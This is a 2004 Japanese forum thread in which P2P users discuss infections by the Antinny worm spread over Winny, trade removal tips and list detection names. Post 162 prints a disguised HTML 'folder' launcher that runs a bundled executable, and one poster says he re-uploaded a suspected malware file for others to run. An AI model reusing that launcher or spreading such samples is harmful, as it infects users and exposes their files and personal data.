作者のACCSに対する怨恨に、nyユーザーがただ単に利用された(だけ)な理由ですか
利用者が多く、にわかユーザーの多いnyはウィルス作者にとっての天国ですよね
どうもです(`・ω・`)むぅ・・

97 :[名無し]さん(bin+cue).rar:04/04/08 01:15 ID:+Ex08cDw
>>94
そのうち全部そうなります。

98 :[名無し]さん(bin+cue).rar:04/04/08 01:23 ID:0rjbxb4h
>>94
hello!!

99 :92:04/04/08 01:29 ID:wrywcRPO
>>95
> nyでUPさせるんじゃなくて、ウィルスが勝手にメールなりなんなりで送信
> するのは「不特定多数が受信可能な状態」にならない。

> 勝手にデータを発信するタイプの常駐ソフトはノートン等だいたいのセキ
> ュリティソフトにひっかかる。

せっかちでした(`・ω・`)またまたどうもです
ノートン先生を天才的ウィルス作者の知恵で、無事(?)くぐりぬけられたとして、ウィルスが映画などの動画を警察などに「勝手に」送信したとしても、それで立件される事はない、と
よく考えたら自分でスキャンした漫画などを「ウィルスのせいで」著作権団体に送りつけられたとしても、言い逃れは出来ますね。(販売前以外)
途中の文は自分には難しかったのでよく分かりませんが、ホムペにうpしたヒトと違って、故意かどうかは判別できないからセーフ、ということでしょうか?
例えノートン先生の隙を突いてデータ送信に成功したとして、著作権団体にnyの使用はバレてもそれ以降の進展はなさそうですね・・
ありがとうございました、寝ます・゚・(つД`)・゚・

100 :[名無し]さん(bin+cue).rar:04/04/08 01:32 ID:pGq9vyzx
>>95
実際に警察が動くかどうかは別にして
「私は下記のファイルをWinnyで不特定多数に公衆送信しています。」
なんてメールを送られてしまうのはかなりイヤ

再起動の時にノートンとかの自動常駐を切ってしまうのは簡単。

>>92
ウィルス作者なんてのは掃いて捨てるほどいるだろうから、一概には言えないけど
「違法ファイルをやりとりしてる奴らに天誅を!」っていうよりも
何も考えずに自分の破壊衝動を満たすためにやっているのが大部分なのでは?

101 :[名無し]さん(bin+cue).rar:04/04/08 01:33 ID:JB7NJrWz
ぜんぜん関係ないけど ホムペ って文字見るとなんかムズムズする

102 :[名無し]さん(bin+cue).rar:04/04/08 01:52 ID:+h+ikBOA
>>92
メール送信などせずに、半非合法ツールのnyにUPさせる
ところがこのウイルスのミソだと思うぞ。しかもnyのexeを
勝手にインスコするのではなく、本人の意思で起動している
ところへやってきて、UPファイルに追加するだけというのがニクい。

勝手にメール送信したり、nyそのものを送りつけて起動したり
すれば、100%作った本人が悪いと断言できるが、感染者が
もともとnyを起動してアレやコレをやってた人間だからな。

女子高生を買ってたら凶悪な性病をうつされました、みたいなものか(w


103 :[名無し]さん(bin+cue).rar:04/04/08 01:59 ID:SG0BzuhJ
.rarファイルの中に.isoと.mdsのほかにシリアル.txt.exeと言うファイルがあって、
解凍したらパスワード入力画面みたいのが出てきたのでビビッてOKボタンではなく
タスクマネージャーで直にwinrarを強制終了させました。
そのあと上記ファイルを解凍したフォルダを見たらシリアル.txt.exeというファイルは
なくなってました。ウィルスだったんでしょうか?先生は反応しませんでしたが。

104 :[名無し]さん(bin+cue).rar:04/04/08 02:12 ID:TiVUWvfX
>>103
無類の怖がり屋さんですね。

105 :[名無し]さん(bin+cue).rar:04/04/08 02:14 ID:aiuLtb3B
それはもう手遅れだな。

106 :[名無し]さん(bin+cue).rar:04/04/08 02:33 ID:fd47c//3
シリアル.txt.exeなんて怪しいもの
このスレ知ってたらフツーさわらないだろうに・・・

多分大丈夫だけど心配なら自戒の意味も込めて再セットすれば?

107 :103:04/04/08 03:23 ID:LxPVIbxe
rarを解凍したあとにそのexeを踏まずに消去すりゃいいやと思ってたんだけど。
解凍終了と同時に勝手に起動したみたい。その後スキャンしたら何も検出され
なかったので大丈夫だったみたい。

108 :[名無し]さん(bin+cue).rar:04/04/08 03:38 ID:GGEsN1+1
ノートン先生とAVGで無反応だったsetup.exeを実行したら
システムが破壊されました ってエラーが出て画面真っ黒。
電源ボタンで終了させてから再起動させたけど
何事もなく立ち上がったんで、ノートンとAVGでウィルスチェックしても検出されず。
こういうジョークソフトの類みたいのってあるの?

109 :[名無し]さん(bin+cue).rar:04/04/08 03:47 ID:hLNAaLaQ
センセーファイルをうちのウイルスキラーさんでスキャンしてみたところ
win32.Parite.b
ってのがでてきました。調べてもあんまみかけないんですが大丈夫ですかね、これ

110 :[名無し]さん(bin+cue).rar:04/04/08 03:52 ID:/fkf3Shk
>>109
大丈夫だから試しに実行してみろ

111 :[名無し]さん(bin+cue).rar:04/04/08 03:53 ID:+Ex08cDw
無問題

112 :[名無し]さん(bin+cue).rar:04/04/08 03:53 ID:SPNW10U5
>>109
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_PARITE.A.DRP
これかな

113 :111:04/04/08 03:55 ID:+Ex08cDw
あ、>>109に対しての返答ね

114 :[名無し]さん(bin+cue).rar:04/04/08 03:56 ID:Ta2FYME+
>>107
スキャン出来るのは既知のウイルスのみ。亜種だったらスキャンできない、危ない。
解凍即起動ってのが信じがたいけど・・・。

>>108
上と同じく亜種の可能性あり。ジョークソフトはなくもない。
ジョークソフトなんかじゃなくて今は潜伏中なのかもしれない、危ない。

115 :109:04/04/08 03:59 ID:hLNAaLaQ
ノートンさん調べてもないから危ないかと思ってたらバスタさんのほうにあったのね
なにはともあれ危険低いようでよかった。ありがとう

116 :[名無し]さん(bin+cue).rar:04/04/08 04:02 ID:Uaf/kFXZ
13543430

117 :[名無し]さん(bin+cue).rar:04/04/08 04:05 ID:MrKaDOcU
103は新種にかかりました。なーむー

118 :[名無し]さん(bin+cue).rar:04/04/08 04:07 ID:64RhfFZk
ちゃんとレジストリが開けたら確実にセーフ?

119 :[名無し]さん(bin+cue).rar:04/04/08 04:10 ID:+Ex08cDw
>>118
ぜんぜんダメ。まるでダメ。だめだめ。もうちとテンプレもみてきてくれよ。

120 :[名無し]さん(bin+cue).rar:04/04/08 04:11 ID:syCCcNxr
知り合いに頼まれて、アプリを2個ほどDLしたんだけど
両方とも、ぬるぽ感染してた。
トリップ付で被参照量も結構あったのに。
アンチウイルスソフトは標準装備でお願いしたい。

121 :[名無し]さん(bin+cue).rar:04/04/08 04:13 ID:/fkf3Shk
>>118
セーフ。大丈夫。安心しる。

122 :[名無し]さん(bin+cue).rar:04/04/08 04:15 ID:+Ex08cDw
ん?

123 :sage:04/04/08 04:15 ID:64RhfFZk
>>121
そうだよな。html開いたかどうかよく覚えてなかったから
不安だったけど、安心しますた。

124 :[名無し]さん(bin+cue).rar:04/04/08 04:17 ID:64RhfFZk
名前欄sageちまった‥逝ってくる

125 :[名無し]さん(bin+cue).rar:04/04/08 04:19 ID:+Ex08cDw
>>123
マジレスしてあげるけど、regeditメモ帳にならないキンタマなんて
前スレで散々でてるじゃん・・・。

126 :[名無し]さん(bin+cue).rar:04/04/08 04:21 ID:/fkf3Shk
ノートンは亜種にも対応したみたいだし、そろそろキンタマ騒ぎも収束するだろ

127 :108:04/04/08 04:24 ID:GGEsN1+1
>>114
レスありがと。
亜種かもしれないね・・・。

詳しく書いとくと
クリックして一瞬フリーズした後モニターが消えて
ctrl+Alt+Deleteでタスクマネージャーを呼び出したら
タスクバーだけ出現。setup.exeも存在してた。
でもこの時既に電源ボタン押しちゃってたんで
その後またexeをいじったらどういう挙動になったのかは不明。

寝る前にバスターのオンラインスキャンもかけとこ・・・。

128 :[名無し]さん(bin+cue).rar:04/04/08 04:25 ID:+Ex08cDw
>>126
するかしないかは、作者次第だろ。
ま、おれの知ったこっちゃないが。
ソーメン食いたい。

129 :[名無し]さん(bin+cue).rar:04/04/08 04:29 ID:64RhfFZk
>>125
前スレ確認してきますた。とりあえずレジストリは正常なようなので安心‥
勉強不足でした。出直してきます

130 :[名無し]さん(bin+cue).rar:04/04/08 04:34 ID:Folmtgxx
winnyしてたらパソコンの画面が、赤くなり、「ぬるぽ」という字が出てパソコンが操作不能になりました。あと、悲鳴も聞こえました。これは何?わかる人教えてください。


131 :[名無し]さん(bin+cue).rar:04/04/08 04:36 ID:MrKaDOcU
今更・・・釣りですか?

132 :[名無し]さん(bin+cue).rar:04/04/08 04:38 ID:/fkf3Shk
>>130
再起動すれば直る。それくらい過去ログ読めば分かるだろ。

133 :[名無し]さん(bin+cue).rar:04/04/08 04:38 ID:D50HliN/
>>130
全画面で赤くなったの?

134 :[名無し]さん(bin+cue).rar:04/04/08 04:45 ID:Folmtgxx
>>133
全画面で赤くなった。血がついたみたいになった。

135 :[名無し]さん(bin+cue).rar:04/04/08 04:50 ID:pGq9vyzx
>>107 >>114
おそらく、解凍したときにノートンが反応したのを
「ウィルスが実行されたから反応したんだ」
って勘違いしてるのだと思う。前スレにもこういう人がいた。

136 :[名無し]さん(bin+cue).rar:04/04/08 04:54 ID:Folmtgxx
>>132
操作できなくて再起動できなかった。電源切ったら起動できなくなったので、WINDOWSを再インストールした。

137 :[名無し]さん(bin+cue).rar:04/04/08 04:55 ID:0rjbxb4h
まだ感染に気付いてないやつがいるよな。
継続的にデスクトップがさらされてるんでしょうか?

138 :135:04/04/08 04:57 ID:pGq9vyzx
ただし、XPのsp1だと「書庫ファイルを解凍しただけでウィルスが実行される」
ってのは有り得る。
詳細は前スレ
http://tmp2.2ch.net/test/read.cgi/download/1080816795/968-978

139 :[名無し]さん(bin+cue).rar:04/04/08 05:09 ID:+h+ikBOA
>>126
作者がタイーホされない限り、亜種が出続けるだろうね。
そして作者タイーホして新作の供給が止まっても、nyの性質上、
キャッシュという形でいつまでもキンタマexeはインターネット上を
さまよい続ける。キャッシュから実ファイルへの変換がかかった
瞬間にワクチンソフトが駆除したとしても、元のキャッシュは
人が消しに行かない限り、残る。そして次のノードへ転送されていく。

さらに悪いことに、キンタマexeを含まないキンタマファイル、いわゆる
プライバシー暴露ファイルだが、これはワクチンが削除しようがない(w
だって、ただの圧縮ファイルだから。暴露ファイルに固有のバイナリ
パターンなんてものはない。

マツリはそのうち収束するだろうが、キンタマが死滅する日は、ny終焉の
日までこないでしょう

140 :[名無し]さん(bin+cue).rar:04/04/08 05:28 ID:pGq9vyzx
>>139
作者が逮捕されることはない。
なぜなら、日本の現行法ではウィルスの作成は違法じゃないから。

ttp://www.ipa.go.jp/security/virus/faq/qa_a.html#7-2

141 :[名無し]さん(bin+cue).rar:04/04/08 05:30 ID:AiG5dCMc
>>139
そこがキンタマ(晒し)の怖いところだね。
データだのHDDだのはなんとでもなるがこればっかりはね・・・・

少なくともnaoは社会的に死んだ・・・・・・・・・

142 :[名無し]さん(bin+cue).rar:04/04/08 05:57 ID:5IgB77bX
regedit.exeをNOTEPAD.EXEで上書きされた・・・・・_| ̄|○
だれか修復方法をお願いします。

143 :[名無し]さん(bin+cue).rar:04/04/08 06:03 ID:+h+ikBOA
>>139追記
キャッシュフォルダに格納されたキンタマの寿命...

ワクチンソフトがWinnyのキャッシュの中を、zipやlzhを展開して
スキャンするのと同じように調べてくれる日は、恐らくこないと
思われる。キャッシュ化の方式は解析されてるということなので
原理的には「nyキャッシュ対応」のワクチンは作成可能だろうが、
ワクチンメーカはそれを作ろうとはしない。なぜなら、
Winnyという「表向きには存在しないはずの裏世界のソフト」の
やっかいごとを、表立って公式サポートしてくれるとは考えにくいからだ。

もしメジャーなワクチンソフトがnyキャッシュ内の駆除をサポート
する日が来るとしたら、それは非nyユーザまでも巻き込んで攻撃
するような改造が施された場合か、セマンティックやトレンドマイクロの
社員のキンタマファイルが作成されてしまった場合(wの、どちらかだろう。





144 :[名無し]さん(bin+cue).rar:04/04/08 06:04 ID:rd6/u7Ms
ノートンには未知のウイルスにも対応できる
検疫というものがあるとヘルプに書いてあったけど
これって全部検疫できるわけじゃないんですか?

145 :[名無し]さん(bin+cue).rar:04/04/08 06:08 ID:aEzmXjH1
>>142

>>1から嫁




>>144
なわけねえだろヴォケ

146 :[名無し]さん(bin+cue).rar:04/04/08 06:10 ID:pGq9vyzx
各種ANTINNYについて。
○いずれも共通するのは「.exeを実行しない限り感染はしない」ということ。
  ウィルスチェックにかけてヒットしたファイルがぞろぞろ出てきたからといって、
  それだけで大騒ぎするのはやめましょう。
 (ただし.folderや.html内のスクリプトから間接的に.exeを実行されることもあるので注意!)

○万一感染してしまったときは
  1.現在実行中のウィルスのプロセスを止める
  2.Windows起動時の自動実行からウィルスの設定を削除する

○プロセスの確認と終了はタスクマネージャ(Ctrl+Alt+Delete)から。
  正常なプロセスのリストは
   ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm

○自動実行の設定はレジストリエディタ(regedit)から
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
  の各項目をチェック
  正常な自動実行のリストは
   ttp://higaitaisaku.web.infoseek.co.jp/iru.html

○レジストリエディタの使用を禁止されてしまった場合は窓の手などを使う

○レジストリエディタを起動したらメモ帳が立ち上がる場合は
  C:\WINDOWS\System32\dllcache\regedit.exe ←こっちを先に修正すること!
  C:\WINDOWS\regedit.exe の二つを、OSのインストールディスク内にあるオリジナルの regedit.exe で上書きする。

○感染の確認方法
  ・WinnyのUpfolder.txtに自分が登録した覚えのないフォルダの記述がある
  ・Winnyのアップフォルダ内に自分が入れた覚えのないファイルがある
  いずれかの症状があれば感染していると思って間違いない。
  ただし、症状がないからといって、感染していないとは限らないので注意。

147 :[名無し]さん(bin+cue).rar:04/04/08 06:13 ID:pGq9vyzx
>>145
>>1から読んでもこのスレには書いてないよ。。。

148 :[名無し]さん(bin+cue).rar:04/04/08 06:16 ID:qvajFubP
VPCくらい金払えよ。試用も出来るんだし

149 :142:04/04/08 06:19 ID:5IgB77bX
>>146
ありがd。
無事修復完了しました。ヽ(´ー`)ノ

これでようやく安心して布団に入れる。

150 :103:04/04/08 06:22 ID:LxPVIbxe
>>135
先生の反応ではありません。ダイアログが出て「〜を入力してください  はい いいえ」系のやつでした。
前スレとはちょっと違うような感じです。
前記のように解凍終了後に自動でダイアログ出現したのでダイアログはさわらずにwinrarをタスクマネージャー
で強制終了するとダイアログも消えて何もおこらず、解凍したフォルダの中にはmdsとisoのみ。
XP SP1でアップデートはそのつどやってるし先生は最新だし、消えちゃったので提出もできないし。
スキャンしてもなにもなかったけど新作亜種の時限式の可能性も考えられるし。分からん。

151 :[名無し]さん(bin+cue).rar:04/04/08 06:24 ID:pGq9vyzx
現在のANTINNY対応状況

●元祖:キモヲタjpg(フォルダアイコン)
ノートン:W32.HLLW.Antinny (ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.html)
バスター:WORM_ANTINNY.A (ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A)

●ハッシュリスト(メモ帳アイコン)
ノートン:W32.HLLW.Antinny.E (ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.e.html)
バスター:WORM_ANTINNY.B (ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.B)

●キンタマ(フォルダorメモ帳アイコン)
ノートン:W32.HLLW.Antinny.G (ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.g.html)
バスター:WORM_ANTINNY.G (ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.G)

●キンタマ亜種(ACCSに個人情報送信)
ノートン:W32.HLLW.Antinny.K (ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.k.html)

●不明:よくわからない亜種
バスター:WORM_ANTINNY.C (ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.C)

●不明:よくわからない亜種
バスター:WORM_ANTINNY.D (ttp://fr.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=58392&VName=WORM_ANTINNY.D&VSect=T)

●Antinny.ms(仮称)(テキストアイコン?)
未対応

●違法ファイル集めてます(WMPアイコン)
未対応

152 :103:04/04/08 06:26 ID:LxPVIbxe
皆さんにも体験していただきたくリネームしてUPしておきますた。
感想をお聞かせください。

153 :[名無し]さん(bin+cue).rar:04/04/08 06:28 ID:pGq9vyzx
>>150
まさか「パスワードのかかった書庫ファイルだった」なんてオチじゃないよな?
ってか、それ以外に考えられない。。。

154 :103:04/04/08 06:30 ID:LxPVIbxe
普通に解凍できちゃいました。勝手に実行されちゃいました

155 :[名無し]さん(bin+cue).rar:04/04/08 06:31 ID:aEzmXjH1
>>154
コンニチハ(略

156 :[名無し]さん(bin+cue).rar:04/04/08 06:33 ID:oSn1VNal
お読みください.folder
てのを圧縮ファイルの中に見つけたんですけど新種でしょうか。
ノートンには引っかからなかったです

157 :[名無し]さん(bin+cue).rar:04/04/08 06:35 ID:pGq9vyzx
>>103
書庫ファイルの中身のうち、シリアル.txt.exe にだけパスがかかっていたとすれば
103 の現象は説明できる。いまのところそれ以外には考えられない。

158 :[名無し]さん(bin+cue).rar:04/04/08 06:38 ID:FyZivvWP
>>156
極窓などで拡張子チェック、エディタ・バイナリエディタでチェック。
おそらくそうだろうが。

159 :103:04/04/08 06:39 ID:LxPVIbxe
>>157
そうかもしれない。そうだと思いたい。

160 :[名無し]さん(bin+cue).rar:04/04/08 06:41 ID:pGq9vyzx
>>156
.folder 自体はウィルスじゃない。あくまでも、ウィルスを実行させるためのスクリプトに過ぎない。
テキストエディタで開いてみれば、何を実行させようとしていたのかわかるはず。
この手のスクリプトはキンタマも使っているはず。

161 :[名無し]さん(bin+cue).rar:04/04/08 06:48 ID:pGq9vyzx
>>103
ちなみに、パスワードがかかったファイルを解凍しようとすると
「パスワードを入力しろ!」っていうダイアログが出るっていうのは知ってる?

162 :156:04/04/08 06:53 ID:oSn1VNal
メモ帳で開いたファイルの中身
<html><head><title></title>
<object CLASSID='CLSID:00000000-0000-0000-0000-FFF085324649' CODEBASE='お読みください(2)/(シリアル集)Pandora - 2004年03月20日版.exe'></object>
<script>window.location = "./";</script>
</head><body></body></html>

htmでした。
この書庫の中には他にも何個かファイルがあったようなんですが、これ以外全部ノートン先生に削除されたようで。
160さんの言ったとうりのようですね。ありがとうございました。

163 :103:04/04/08 06:53 ID:LxPVIbxe
そのダイアログを実際にみた事はないけど今回は全て解凍し終わって通常だとフォルダの中身が
表示されるタイミングに出てきました。

164 :[名無し]さん(bin+cue).rar:04/04/08 06:58 ID:pGq9vyzx
>>163
そのタイミングでOK。
以上、終了。

165 :103:04/04/08 07:02 ID:LxPVIbxe
・・・会社に逝って来ます。

166 :[名無し]さん(bin+cue).rar:04/04/08 07:12 ID:8HpojBQz
>>165
いってら。
会社に行くとはうらやましい。

167 :[名無し]さん(bin+cue).rar:04/04/08 07:16 ID:xNEQrCs7
とりあえず、キンタマ等で流出したデータを消す方法を考えてみた

・47氏がデフォルトで流出データのキャッシュを削除する新バージョンを作る
・新バージョンはできればny1とny2の両方が理想的
・新バージョンの公開と同時に旧バージョンの公開を停止
・旧バージョンを転載してるサイトにも協力要請
・旧バージョンの漸減と共に流出データのキャッシュも漸減
・キャッシュから変換されたファイルは、その公開を「意図的なもの」として対処し、既所有者のHDD内に封じ込める

とココまで書いて気が付いた
京都府Kが余計な事しなければ、最後の以外は47氏が自発的にやってたんじゃないか?
47氏としても、ワームなんぞでnyが崩壊するのを座視したりはしないと思うし
て事はアレだ、京都府Kは自業自得ってーか因果応報って事なんだなw

168 :[名無し]さん(bin+cue).rar:04/04/08 07:42 ID:hktPuEdf
>>167
だなw47氏につっかかったりしなければ、流出した事は隠せたろうにw

169 :[名無し]さん(bin+cue).rar:04/04/08 08:17 ID:Y6i1EnU3
47氏がnyを作らなければ
著作権侵害者も今ほど多くないし
警察の捜査情報も漏れなかった。

巡査も47氏の被害者だ。
nyが生まれたことによって誰が得をしたのだろう?

補導歴すらもない善良な市民の化けの皮をはいで
誰もが著作権侵害者となるシステムを造った罪は重い。

170 :[名無し]さん(bin+cue).rar:04/04/08 08:23 ID:hktPuEdf
>>169
お前はなに言ってるんだ?お前が言ってるのは包丁で殺人事件が
おきたら包丁を作った業者が悪いと言ってるもんだぞ?

>補導歴すらもない善良な市民の化けの皮をはいで
>誰もが著作権侵害者となるシステムを造った罪は重い。
日本語おかしくない?



171 :[名無し]さん(bin+cue).rar:04/04/08 08:36 ID:T+w75iEj
とあるファイルを実行したらドラクエの呪われる音がして
コマンドプロンプトの画面になって、画面が上から真っ赤になりました・・。
これは何なんでしょう?
知っている方が居たら教えてもらえますか?

172 :[名無し]さん(bin+cue).rar:04/04/08 08:46 ID:pQqmwFXV
>>171
あ〜あ……冒険の書消えたねこりゃ。

ソフトにショックを与えたらダメだよ……。

173 :[名無し]さん(bin+cue).rar:04/04/08 09:05 ID:ecvYuLOb
>>171
呪われました。
呪いを解きましょう。

174 :[名無し]さん(bin+cue).rar:04/04/08 09:10 ID:rpD4LsJo
キンタマウイルスは困るけど、
自動的に任意の時間ごとにデスクトップ画像を撮影してくれる
普通のソフトってないですかね?
こういうのって企業や学校や親などが情報漏えいとか
不適切なPCの使用を防止するために
コンピューターの動作を監視するのにも使えるような。
漏れは別の用途で使いたいことがあるんだけれども。

175 :[名無し]さん(bin+cue).rar:04/04/08 09:22 ID:olFnGMPz
ベクターくらい見てからにしろ。
ttp://www.vector.co.jp/vpack/filearea/win/art/graphics/saver/index.html

176 :[名無し]さん(bin+cue).rar:04/04/08 09:38 ID:2xoeHUHr
時々話題になるnaoって誰なんだ?

177 :[名無し]さん(bin+cue).rar:04/04/08 09:44 ID:hktPuEdf
>>176
ストレートにいうとキンタマで晒されたやつ

178 :[名無し]さん(bin+cue).rar:04/04/08 09:52 ID:mVX5iDDn
>>177
じゃありょうってだれ?

179 :[名無し]さん(bin+cue).rar:04/04/08 09:53 ID:KJ9IdIcp
>>178
これまたキンタマで晒されたやつ

180 :[名無し]さん(bin+cue).rar:04/04/08 09:59 ID:jBSooFpm
最近regeditが起動した瞬間落ちるんだが・・・・
でも「キンタマ」の症状確認項目は全部外れてる…
どうしたんだろう…

181 :[名無し]さん(bin+cue).rar:04/04/08 10:04 ID:2xoeHUHr
>>177
naoとかりょうとかじゃ、本名じゃないのに、
どうして社会的に死んだことになるんだろう。
そんなにやばいファイルが流れたのか?

182 :[名無し]さん(bin+cue).rar:04/04/08 10:04 ID:Y8EIlRtt
亜種?

183 :[名無し]さん(bin+cue).rar:04/04/08 10:07 ID:5w8VzBKN
>>181
やばいさ。京都府警捜査資料だからな。

184 :[名無し]さん(bin+cue).rar:04/04/08 10:09 ID:2xoeHUHr
>>183
つまり、京都府警でキンタマに感染したっていうアホがnaoなんだな。
その資料から本人が特定されたわけか。

185 :[名無し]さん(bin+cue).rar:04/04/08 10:10 ID:mtun5tzG
みなさんはじめまして!今年で小学六年生になる千佳です(>_<)
とつぜんですが私と一緒に謝ってくれる人を募集しています
よろしくおねがいします(m__m)

186 :[名無し]さん(bin+cue).rar:04/04/08 10:22 ID:JB7NJrWz
まだ春休みなの? いいなあ小学生。

187 :[名無し]さん(bin+cue).rar:04/04/08 10:24 ID:LnX9M3EZ
何を謝るんだ?

188 :[名無し]さん(bin+cue).rar:04/04/08 10:28 ID:XDkxBE8h
何かぼ〜っとしてたら176kの~と言うファイルが出来たのですが、ウイルスとなんか関係ありますかね?
XPで、NEC製のPCなのですが・・・・。

189 :[名無し]さん(bin+cue).rar:04/04/08 10:29 ID:Y8EIlRtt
それだけじゃ何とも・・・

190 :[名無し]さん(bin+cue).rar:04/04/08 10:35 ID:09xFh0sm
>>188
これじゃないのか?
ttp://homepage2.nifty.com/winfaq/c/oetrouble.html#1475

191 :[名無し]さん(bin+cue).rar:04/04/08 10:36 ID:XDkxBE8h
デスクトップに何かぽっとできたとです。
属性はアーカイブとなっております・・・・。
自分が何か変なことをしたともかぎりませんが、一応念のため・・・・。

192 :[名無し]さん(bin+cue).rar:04/04/08 10:38 ID:sBDtsMS8
オンラインスキャンができるところ。

シマンテック (セキュリティ検査機能有り)
ttp://www.symantec.co.jp/region/jp/securitycheck/
ウイルスバスター
ttp://www.trendmicro.co.jp/hcall/index.asp
ハウリジャパン
ttp://www.haurijapan.com/04_support/support_livecall.html
IWI ウイルスチェイサー
ttp://www.iwi.co.jp/japanese/cons/info/vc/vc_online.htm
Panda ActiveScan(駆除、削除機能有り)
ttp://www.pandasoftware.com/activescan/jp/activescan_principal.htm

193 :[名無し]さん(bin+cue).rar:04/04/08 10:40 ID:XDkxBE8h
>>191
ショートカット自体がないのですが・・・・。

194 :[名無し]さん(bin+cue).rar:04/04/08 10:49 ID:G7MBEr+r
ルートドライブのフォーマットってしても大丈夫なの?
フォーマットの仕方を丁寧に解説してるサイトキボン

195 :[名無し]さん(bin+cue).rar:04/04/08 10:55 ID:DejWDCQY
ん〜、ドライブCの容量が心なしかどんどん増えてる気がするんですが.....
こんなウィルスありましたっけ?

196 :[名無し]さん(bin+cue).rar:04/04/08 10:58 ID:hktPuEdf
>>195
そんなおいしいウィルス欲しい、、、
つーかどのくらい増えてるの?1GBとかだったら異常だと思う

197 :[名無し]さん(bin+cue).rar:04/04/08 11:00 ID:Y8EIlRtt
使用領域が増えてるんじゃあ?とまじれす

198 :[名無し]さん(bin+cue).rar:04/04/08 11:00 ID:DejWDCQY
>>196
あっ、増えると言うか、中身のなんかわからないけどたぶんファイルとかが
消えて、昨日からで、3GBくらい増えてる(たぶん消えてるから)
何が消えてるのか不安です

199 :[名無し]さん(bin+cue).rar:04/04/08 11:06 ID:IJrHaKzJ
それは増えてるとは言わない w

200 :[名無し]さん(bin+cue).rar:04/04/08 11:09 ID:XDkxBE8h
デフラグしてみれば?

201 :[名無し]さん(bin+cue).rar:04/04/08 11:10 ID:DejWDCQY
>199
そうですね。
結局こういうドライブCの中身が消える類のウィルスってあるんですか?

202 :[名無し]さん(bin+cue).rar:04/04/08 11:13 ID:TiVUWvfX
>>201
今、話題の

203 :[名無し]さん(bin+cue).rar:04/04/08 11:13 ID:XDkxBE8h
>>202
キンタマ!!

204 :[名無し]さん(bin+cue).rar:04/04/08 11:16 ID:DejWDCQY
>201
キンタマのなんてやつですか?

205 :[名無し]さん(bin+cue).rar:04/04/08 11:18 ID:MrKaDOcU
キンタマJですね。

206 :[名無し]さん(bin+cue).rar:04/04/08 11:21 ID:XDkxBE8h
>>204
上の方にのってますよ!

207 :[名無し]さん(bin+cue).rar:04/04/08 11:24 ID:olFnGMPz
>>184
マジレスすると京都府警の巡査はりょう。
naoはキンタマによって神になった男。
詳しくはココ嫁。
ttp://tofuya.2log.net/archives/blog333.html

208 :[名無し]さん(bin+cue).rar:04/04/08 11:25 ID:DejWDCQY
>>205 206
ありがとうございます。探します。

209 :[名無し]さん(bin+cue).rar:04/04/08 11:38 ID:XDkxBE8h
J祭り開始ってか?
かなり騒いでますが、何らたいしたことないみたいですよ。
ny信者だけです、騒いでるのは・・・・。


210 :[名無し]さん(bin+cue).rar:04/04/08 12:04 ID:hktPuEdf
>>209
つーかどこで騒いでるの?見当たらないんだけど

211 :[名無し]さん(bin+cue).rar:04/04/08 12:17 ID:SyY4s3a6
>>210
>>209 の脳内(w

212 :[名無し]さん(bin+cue).rar:04/04/08 12:22 ID:pQqmwFXV
新種・亜種まだーチンチン

213 :[名無し]さん(bin+cue).rar:04/04/08 12:52 ID:8Gr8xaTK
>>78
おまえXPで100%になる例のアレじゃないだろうな?
それウィルスじゃねーよ

214 :[名無し]さん(bin+cue).rar:04/04/08 13:10 ID:LJrjJ4jm
【アルバム】 2004.03.31 L'Arc〜en〜Ciel SMILE.zip oXhGUYGRiv 102,403,447 504001027988bdd764c09e9c47e425a2

これに入ってるexe踏んじまった・・・
単純なフォルダアイコンのexeファイルだったのに・・・

215 :[名無し]さん(bin+cue).rar:04/04/08 13:13 ID:+FfHLHtL
>>214
キンタマの世界へ



(・∀・)コンニチハ!

216 :[名無し]さん(bin+cue).rar:04/04/08 13:16 ID:hktPuEdf
>>214
悪い事イワンから窓の手でフォルダアイコン変えとけ
一発でわかるようになる

217 :[名無し]さん(bin+cue).rar:04/04/08 13:22 ID:x5vcstGt
ちょっと荒療治だか有効な対策教えてやる。

C:の中身すべてZIPなりRARで固めろ、もちろん隠しファイルも含めて
全部。まぁ容量が大きいが今の大容量HDDなら問題ないだろ。
そして感染して対処方がわからなかったら、
それを解凍して全部上書きしろ。
それで解決だ。

218 :[名無し]さん(bin+cue).rar:04/04/08 13:25 ID:LJrjJ4jm
>>215
(・∀・)コンニチハ!

>>216
その手があったか!最いんすこしたら早速するよ。サンクス
フォルダアイコンのexeなんて踏むわけねーじゃんバカが!
ってたかをくくってたからショックだ

テンプレのとおり一通りチェックしてみたけど、キンタマとかアンチnyの形跡がない・・・
いったい何に感染したんだかねw
とりあえずマターリとファイルのバックアップでもするか

219 :[名無し]さん(bin+cue).rar:04/04/08 13:30 ID:LJrjJ4jm
自己レス。>>74のヤシだった。対策マンドクサ

220 :[名無し]さん(bin+cue).rar:04/04/08 13:46 ID:TXAPv/pw
俺も昨日はじめて・・・>>74のヤツ。
フォルダアイコン変えた。

221 :[名無し]さん(bin+cue).rar:04/04/08 13:51 ID:hktPuEdf
>>218、220
多分やってると思うけどエクスプローラのツールで拡張子表示にも
しておいたほうがいいぞ

222 :[名無し]さん(bin+cue).rar:04/04/08 13:53 ID:TXAPv/pw
>>221
それにしたばっかなのに、やっちゃって・・・自分の馬鹿にもショック。
ダブルクリックした直後「あっ!」って。

223 :[名無し]さん(bin+cue).rar:04/04/08 14:01 ID:LJrjJ4jm
親ファイルはあったものの、子ファイルがない・・・
サービスにも登録されてなかった
ないんだからいいのかもしれんが、やっぱあとで再いんすこかな

>>221
それは何年も前からしてある
なのにダブルクリックしてしちゃった
なんかこう、ノリでカチカチカチカチとフォルダをどんどん開いちゃうんだよなw
俺ってバカだなぁと猛省してます

